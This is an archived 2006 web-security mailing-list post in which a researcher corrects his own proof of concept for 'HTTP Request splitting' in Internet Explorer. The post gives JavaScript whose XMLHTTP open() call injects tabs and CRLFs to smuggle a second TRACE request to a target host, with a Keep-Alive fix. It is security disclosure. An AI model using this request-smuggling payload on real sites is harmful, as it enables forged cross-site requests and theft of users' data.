>
> Well, you can try the technique I dubbed "HTTP Request splitting", see
> "Exploiting the XmlHttpRequest object in IE - Referrer spoofing, and a lot more..." by
> yours truly,
> http://www.webappsec.org/lists/websecurity/archive/2005-09/msg00019.html
>
> Try something like this:
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
>
> x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:",
> "/",false);
>
I should've taken care of the connection persistence...
Please use (note the addition of the "Connection: Keep-Alive" header):
x.open("GET\t/\tHTTP/1.0\r\nHost:\twww.target.site\r\nConnection:\t
Keep- Alive\r\n\r\nTRACE\t/\tHTTP/1.0\r\nFoobar:","/",false);
> x.send();
>
[...]
-Amit
-------------------------------------------------------------------------
This List Sponsored by: SpiDynamics
ALERT: "How A Hacker Launches A Web Application Attack!"
Step-by-Step - SPI Dynamics White Paper
Learn how to defend against Web Application Attacks with real-world
examples of recent hacking methods such as: SQL Injection, Cross Site
Scripting and Parameter Manipulation
https://download.spidynamics.com/1/ad/web.asp?Campaign_ID=701300000003gRl
--------------------------------------------------------------------------
Received on Mar 21 2006
Intro
